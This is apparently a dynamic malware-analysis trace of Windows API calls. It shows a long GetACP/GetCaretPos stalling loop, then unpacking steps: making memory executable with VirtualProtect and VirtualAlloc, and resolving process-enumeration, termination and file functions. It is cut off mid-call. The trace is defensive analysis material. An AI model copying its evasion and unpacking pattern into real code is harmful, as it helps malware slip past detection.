[0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.891] GetACP () returned 0x4e4 [0083.891] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.892] GetACP () returned 0x4e4 [0083.892] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.893] GetACP () returned 0x4e4 [0083.893] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.894] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.894] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.895] GetACP () returned 0x4e4 [0083.895] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.896] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.896] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.897] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.897] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.898] GetACP () returned 0x4e4 [0083.898] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.899] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.899] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.900] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.900] GetACP () returned 0x4e4 [0083.901] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.901] GetACP () returned 0x4e4 [0083.901] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.901] GetACP () returned 0x4e4 [0083.901] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.901] GetACP () returned 0x4e4 [0083.901] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.901] GetACP () returned 0x4e4 [0083.901] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.926] GetACP () returned 0x4e4 [0083.926] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.926] GetACP () returned 0x4e4 [0083.926] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.926] GetACP () returned 0x4e4 [0083.926] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.926] GetACP () returned 0x4e4 [0083.926] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.926] GetACP () returned 0x4e4 [0083.926] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.926] GetACP () returned 0x4e4 [0083.926] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.926] GetACP () returned 0x4e4 [0083.926] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.926] GetACP () returned 0x4e4 [0083.926] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.926] GetACP () returned 0x4e4 [0083.927] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.927] GetACP () returned 0x4e4 [0083.927] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.927] GetACP () returned 0x4e4 [0083.927] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.927] GetACP () returned 0x4e4 [0083.927] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0084.486] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76e10000 [0084.486] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0084.486] VirtualProtect (in: lpAddress=0x311698, dwSize=0x56041, flNewProtect=0x40, lpflOldProtect=0x18f714 | out: lpflOldProtect=0x18f714*=0x4) returned 1 [0084.491] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0084.491] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0084.491] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0084.491] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0084.491] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0084.491] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0084.491] GetProcAddress (hModule=0x76e10000, lpProcName="Module32First") returned 0x76ea5cd9 [0084.491] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0084.491] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0084.494] Module32First (hSnapshot=0x58, lpme=0x18f4dc) returned 1 [0084.495] VirtualAlloc (lpAddress=0x0, dwSize=0x89450, flAllocationType=0x1000, flProtect=0x40) returned 0x1bd0000 [0084.506] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0084.506] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0084.506] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0084.506] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0084.506] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0084.506] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0084.506] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0084.506] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0084.506] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0084.506] SetErrorMode (uMode=0x400) returned 0x0 [0084.506] SetErrorMode (uMode=0x0) returned 0x400 [0084.507] GetVersionExA (in: lpVersionInformation=0x18e40c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x6, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e40c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0084.507] VirtualAlloc (lpAddress=0x0, dwSize=0x88600, flAllocationType=0x1000, flProtect=0x4) returned 0x1c60000 [0084.551] VirtualProtect (in: lpAddress=0x400000, dwSize=0x8d000, flNewProtect=0x40, lpflOldProtect=0x18f494 | out: lpflOldProtect=0x18f494*=0x2) returned 1 [0085.091] VirtualFree (lpAddress=0x1c60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.096] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0085.096] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryA") returned 0x76e4d526 [0085.096] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0085.097] GetProcAddress (hModule=0x76e10000, lpProcName="CreateMutexA") returned 0x76e24c6b [0085.097] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0085.097] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0085.097] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0085.097] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0085.097] GetProcAddress (hModule=0x76e10000, lpProcName="ReadFile") returned 0x76e23ed3 [0085.097] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileSize") returned 0x76e2196e [0085.097] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0085.097] GetProcAddress (hModule=0x76e10000, lpProcName="Process32Next") returned 0x76e488a4 [0085.097] GetProcAddress (hModule=0x76e10000, lpProcName="Process32First") returned 0x76e48ae7 [0085.097] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0085.097] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="OpenProcess") returned 0x76e21986 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="FileTimeToSystemTime") returned 0x76e2542c [0085.098] GetProcAddress 